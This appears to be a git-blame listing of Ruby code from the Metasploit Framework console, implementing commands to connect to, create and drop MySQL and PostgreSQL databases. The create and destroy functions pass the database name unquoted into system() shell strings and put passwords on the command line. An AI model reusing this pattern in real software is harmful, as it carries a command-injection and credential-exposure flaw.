|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
opts['host'] ||= 'localhost'
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
# This is an ugly hack for a broken MySQL adapter:
|
|
|
|
# http://dev.rubyonrails.org/ticket/3338
|
|
|
|
if (opts['host'].strip.downcase == 'localhost')
|
|
|
|
opts['host'] = Socket.gethostbyname("localhost")[3].unpack("C*").join(".")
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (not framework.db.connect(opts))
|
2009-11-14 21:41:38 +00:00
|
|
|
raise RuntimeError.new("Failed to connect to the database: #{framework.db.error}")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Create a new MySQL database instance
|
2009-11-06 16:01:24 +00:00
|
|
|
#
|
2009-03-28 21:42:30 +00:00
|
|
|
def db_create_mysql(*args)
|
2010-05-02 02:07:30 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
cmd_db_disconnect()
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
if(args[0] == nil or args[0] == "-h" or args[0] == "--help")
|
|
|
|
print_status(" Usage: db_create <user:pass>@<host:port>/<database>")
|
|
|
|
print_status("Examples:")
|
|
|
|
print_status(" db_create user@metasploit3")
|
|
|
|
print_status(" db_create user:pass@192.168.0.2/metasploit3")
|
|
|
|
print_status(" db_create user:pass@192.168.0.2:1500/metasploit3")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
return if ! db_find_tools(%W{mysqladmin mysql})
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
info = db_parse_db_uri_mysql(args[0])
|
|
|
|
opts = { 'adapter' => 'mysql' }
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
argv = []
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:user])
|
2009-11-06 16:01:24 +00:00
|
|
|
opts['username'] = info[:user]
|
2009-03-28 21:42:30 +00:00
|
|
|
argv.push('-u')
|
|
|
|
argv.push(info[:user])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:pass])
|
|
|
|
argv.push('--password=' + info[:pass])
|
2009-11-06 16:01:24 +00:00
|
|
|
opts['password'] = info[:pass]
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:host])
|
|
|
|
opts['host'] = info[:host]
|
|
|
|
argv.push('-h')
|
|
|
|
argv.push(info[:host])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:port])
|
|
|
|
opts['port'] = info[:port]
|
|
|
|
argv.push('-P')
|
|
|
|
argv.push(info[:port])
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
# This is an ugly hack for a broken MySQL adapter:
|
|
|
|
# http://dev.rubyonrails.org/ticket/3338
|
|
|
|
if (opts['host'].strip.downcase == 'localhost')
|
|
|
|
opts['host'] = Socket.gethostbyname("localhost")[3].unpack("C*").join(".")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
argv.push('-f')
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
opts['database'] = info[:name]
|
|
|
|
|
|
|
|
cargs = argv.map{|c| "'#{c}' "}.join
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
system("mysqladmin #{cargs} drop #{info[:name]} >/dev/null 2>&1")
|
|
|
|
system("mysqladmin #{cargs} create #{info[:name]}")
|
2009-12-10 15:12:59 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (not framework.db.connect(opts))
|
2009-11-14 21:41:38 +00:00
|
|
|
raise RuntimeError.new("Failed to connect to the database: #{framework.db.error}")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
|
2009-12-07 17:03:27 +00:00
|
|
|
print_status("Database creation complete (check for errors)")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Drop an existing database
|
|
|
|
#
|
|
|
|
def db_destroy_mysql(*args)
|
|
|
|
|
|
|
|
cmd_db_disconnect()
|
|
|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
return if ! db_find_tools(%W{mysqladmin})
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
info = db_parse_db_uri_mysql(args[0])
|
|
|
|
argv = []
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:user])
|
|
|
|
argv.push('-u')
|
|
|
|
argv.push(info[:user])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:pass])
|
|
|
|
argv.push('--password=' + info[:pass])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:host])
|
|
|
|
argv.push('-h')
|
|
|
|
argv.push(info[:host])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:port])
|
|
|
|
argv.push('-P')
|
|
|
|
argv.push(info[:port])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
argv.push("-f")
|
|
|
|
|
|
|
|
cargs = argv.map{|c| "'#{c}' "}.join
|
|
|
|
system("mysqladmin -f #{cargs} drop #{info[:name]}")
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
def db_parse_db_uri_mysql(path)
|
|
|
|
res = {}
|
|
|
|
if (path)
|
|
|
|
auth, dest = path.split('@')
|
|
|
|
(dest = auth and auth = nil) if not dest
|
|
|
|
res[:user],res[:pass] = auth.split(':') if auth
|
|
|
|
targ,name = dest.split('/')
|
|
|
|
(name = targ and targ = nil) if not name
|
|
|
|
res[:host],res[:port] = targ.split(':') if targ
|
|
|
|
end
|
|
|
|
res[:name] = name || 'metasploit3'
|
|
|
|
res
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2010-05-17 04:49:17 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
#
|
|
|
|
# Database management: Postgres
|
|
|
|
#
|
|
|
|
|
|
|
|
#
|
|
|
|
# Connect to an existing Postgres database
|
|
|
|
#
|
2009-04-12 07:09:03 +00:00
|
|
|
def db_connect_postgresql(*args)
|
2009-11-14 21:41:38 +00:00
|
|
|
if(args[0] == nil or args[0] == "-h" or args[0] == "--help")
|
|
|
|
print_status(" Usage: db_connect <user:pass>@<host:port>/<database>")
|
2010-10-23 23:20:43 +00:00
|
|
|
print_status(" OR: db_connect -y [path/to/database.yml]")
|
2009-11-14 21:41:38 +00:00
|
|
|
print_status("Examples:")
|
|
|
|
print_status(" db_connect user@metasploit3")
|
|
|
|
print_status(" db_connect user:pass@192.168.0.2/metasploit3")
|
|
|
|
print_status(" db_connect user:pass@192.168.0.2:1500/metasploit3")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
2009-04-12 07:09:03 +00:00
|
|
|
info = db_parse_db_uri_postgresql(args[0])
|
2009-03-28 21:42:30 +00:00
|
|
|
opts = { 'adapter' => 'postgresql' }
|
|
|
|
|
|
|
|
opts['username'] = info[:user] if (info[:user])
|
|
|
|
opts['password'] = info[:pass] if (info[:pass])
|
|
|
|
opts['database'] = info[:name]
|
|
|
|
opts['host'] = info[:host] if (info[:host])
|
|
|
|
opts['port'] = info[:port] if (info[:port])
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
opts['pass'] ||= ''
|
|
|
|
|
|
|
|
# Do a little legwork to find the real database socket
|
|
|
|
if(! opts['host'])
|
|
|
|
while(true)
|
|
|
|
done = false
|
|
|
|
dirs = %W{ /var/run/postgresql /tmp }
|
|
|
|
dirs.each do |dir|
|
|
|
|
if(::File.directory?(dir))
|
|
|
|
d = ::Dir.new(dir)
|
|
|
|
d.entries.grep(/^\.s\.PGSQL.(\d+)$/).each do |ent|
|
|
|
|
opts['port'] = ent.split('.')[-1].to_i
|
|
|
|
opts['host'] = dir
|
|
|
|
done = true
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
break if done
|
|
|
|
end
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Default to loopback
|
|
|
|
if(! opts['host'])
|
|
|
|
opts['host'] = '127.0.0.1'
|
|
|
|
end
|
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (not framework.db.connect(opts))
|
2009-11-14 21:41:38 +00:00
|
|
|
raise RuntimeError.new("Failed to connect to the database: #{framework.db.error}")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Create a new Postgres database instance
|
2009-11-06 16:01:24 +00:00
|
|
|
#
|
2009-04-12 07:09:03 +00:00
|
|
|
def db_create_postgresql(*args)
|
2009-03-28 21:42:30 +00:00
|
|
|
cmd_db_disconnect()
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
if(args[0] == nil or args[0] == "-h" or args[0] == "--help")
|
|
|
|
print_status(" Usage: db_create <user:pass>@<host:port>/<database>")
|
|
|
|
print_status("Examples:")
|
|
|
|
print_status(" db_create user@metasploit3")
|
|
|
|
print_status(" db_create user:pass@192.168.0.2/metasploit3")
|
|
|
|
print_status(" db_create user:pass@192.168.0.2:1500/metasploit3")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
return if ! db_find_tools(%W{psql dropdb createdb})
|
|
|
|
|
2009-04-12 07:09:03 +00:00
|
|
|
info = db_parse_db_uri_postgresql(args[0])
|
2009-03-28 21:42:30 +00:00
|
|
|
opts = { 'adapter' => 'postgresql' }
|
|
|
|
argv = []
|
|
|
|
|
|
|
|
if (info[:user])
|
2009-11-06 16:01:24 +00:00
|
|
|
opts['username'] = info[:user]
|
2009-03-28 21:42:30 +00:00
|
|
|
argv.push('-U')
|
|
|
|
argv.push(info[:user])
|
2009-03-28 23:04:28 +00:00
|
|
|
else
|
|
|
|
opts['username'] = 'postgres'
|
|
|
|
argv.push('-U')
|
|
|
|
argv.push('postgres')
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
if (info[:pass])
|
|
|
|
print()
|
|
|
|
print_status("Warning: You will need to enter the password at the prompts below")
|
|
|
|
print()
|
|
|
|
argv.push('-W')
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:host])
|
|
|
|
opts['host'] = info[:host]
|
|
|
|
argv.push('-h')
|
|
|
|
argv.push(info[:host])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:port])
|
|
|
|
opts['port'] = info[:port]
|
|
|
|
argv.push('-p')
|
|
|
|
argv.push(info[:port])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
opts['database'] = info[:name]
|
|
|
|
|
|
|
|
cargs = argv.map{|c| "'#{c}' "}.join
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
system("dropdb #{cargs} #{info[:name]} >/dev/null 2>&1")
|
|
|
|
system("createdb #{cargs} #{info[:name]}")
|
|
|
|
|
2009-12-11 18:54:19 +00:00
|
|
|
opts['password'] = info[:pass] || ''
|
2009-11-14 21:41:38 +00:00
|
|
|
|
|
|
|
# Do a little legwork to find the real database socket
|
|
|
|
if(! opts['host'])
|
|
|
|
while(true)
|
|
|
|
done = false
|
|
|
|
dirs = %W{ /var/run/postgresql /tmp }
|
|
|
|
dirs.each do |dir|
|
|
|
|
if(::File.directory?(dir))
|
|
|
|
d = ::Dir.new(dir)
|
|
|
|
d.entries.grep(/^\.s\.PGSQL.(\d+)$/).each do |ent|
|
|
|
|
opts['port'] = ent.split('.')[-1].to_i
|
|
|
|
opts['host'] = dir
|
|
|
|
done = true
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
break if done
|
|
|
|
end
|
|
|
|
break
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Default to loopback
|
|
|
|
if(! opts['host'])
|
|
|
|
opts['host'] = '127.0.0.1'
|
|
|
|
end
|
2009-03-28 21:42:30 +00:00
|
|
|
|
|
|
|
if (not framework.db.connect(opts))
|
2009-11-14 21:41:38 +00:00
|
|
|
raise RuntimeError.new("Failed to connect to the database: #{framework.db.error}")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
2009-12-07 17:03:27 +00:00
|
|
|
|
|
|
|
print_status("Database creation complete (check for errors)")
|
2009-03-28 21:42:30 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Drop an existing database
|
|
|
|
#
|
2009-04-12 07:09:03 +00:00
|
|
|
def db_destroy_postgresql(*args)
|
2009-03-28 21:42:30 +00:00
|
|
|
|
|
|
|
cmd_db_disconnect()
|
|
|
|
|
2009-11-14 21:41:38 +00:00
|
|
|
return if ! db_find_tools(%W{dropdb})
|
|
|
|
|
2009-04-12 07:09:03 +00:00
|
|
|
info = db_parse_db_uri_postgresql(args[0])
|
2009-03-28 21:42:30 +00:00
|
|
|
argv = []
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:user])
|
|
|
|
argv.push('-U')
|
|
|
|
argv.push(info[:user])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:pass])
|
|
|
|
print()
|
|
|
|
print_status("Warning: You will need to enter the password at the prompts below")
|
|
|
|
print()
|
|
|
|
argv.push('-W')
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:host])
|
|
|
|
argv.push('-h')
|
|
|
|
argv.push(info[:host])
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-03-28 21:42:30 +00:00
|
|
|
if (info[:port])
|
|
|
|
argv.push('-p')
|
|
|
|
argv.push(info[:port])
|
|
|
|
end
|
|
|
|
|
|
|
|
cargs = argv.map{|c| "'#{c}' "}.join
|
|
|
|
system("dropdb #{cargs} #{info[:name]}")
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2009-04-12 07:09:03 +00:00
|
|
|
def db_parse_db_uri_postgresql(path)
|
2009-03-28 21:42:30 +00:00
|
|
|
res = {}
|
|
|
|
if (path)
|
|
|
|
auth, dest = path.split('@')
|
|
|
|
(dest = auth and auth = nil) if not dest
|
|
|
|
res[:user],res[:pass] = auth.split(':') if auth
|
|
|
|
targ,name = dest.split('/')
|
|
|
|
(name = targ and targ = nil) if not name
|
|
|
|
res[:host],res[:port] = targ.split(':') if targ
|
|
|
|
end
|
|
|
|
res[:name] = name || 'metasploit3'
|
|
|
|
res
|
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|
2006-05-30 15:44:48 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2008-10-27 22:47:09 +00:00
|
|
|
end
|
2009-11-06 16:01:24 +00:00
|
|
|
|